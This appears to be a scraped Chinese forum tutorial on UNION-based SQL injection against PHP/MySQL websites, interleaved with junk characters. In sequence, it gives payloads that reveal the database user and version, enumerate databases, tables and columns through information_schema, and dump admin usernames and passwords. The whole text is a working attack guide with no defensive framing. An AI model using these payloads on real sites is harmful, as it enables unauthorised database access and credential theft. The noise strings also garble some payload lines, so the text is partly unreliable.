+ z# p, F4 J" K; F
教程内容:Mysql 5+php 注入
6 g$ x* E/ c3 Q. S
4 ]- r$ \4 t0 ?* S6 c2 t
$ [. G" @3 c$ a1 l: x% Z5 S) t- g3 }% v6 c5 G
一.查看MYSQL基本信息(库名,版本,用户)
+ P) V4 b; G! G% s3 X& N& j2 q- o
+ a1 S4 V, Q+ l7 K! F5 O! Cand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
+ o: M7 u; h/ a ]9 y6 U7 J2 L: j0 b0 I, t
二.查数据库
; w0 }+ D: N6 ]9 D2 v S/ K P) m; {8 x8 x" C$ X
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*- @- d: o$ }$ W% t; B) h/ ~) e$ h
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。8 u g# p4 [* n+ J' m
6 h' \+ k8 U$ l) z3 c0 N7 G; g9 q
三.暴表! E; N. I ^* ~; o! ~4 g
1 E9 L% `1 T- ~0 G. Z9 @3 sand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
+ H5 S7 o# Q2 ~' Y e; j! i; }& R5 v$ z6 x2 `( v& o
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
6 N: }2 P5 B+ l7 e4 ?+ J8 l+ l6 v
& H4 K \6 Y# ^. o2 M2 R3 h. \四.暴字段* J4 T0 G \' z
3 o( S d- X* C" G; s
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*: @4 x1 O9 k! ^7 R
( J% g/ u+ n. t" S4 plimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。" e0 Z8 B- E: F) }
) n# e. j( P$ N2 Q) H五.暴数据
1 r* T# Z- _) Y4 p$ r8 ?& L/ G8 d& i. [8 b4 t# t# h! Y
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
9 r2 {% x/ g& S7 h6 B" G I
; h8 b6 e+ Z' R# u z
$ Y8 [0 c3 Q8 n& I4 v这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
) {! H* o, F4 P! ~ W |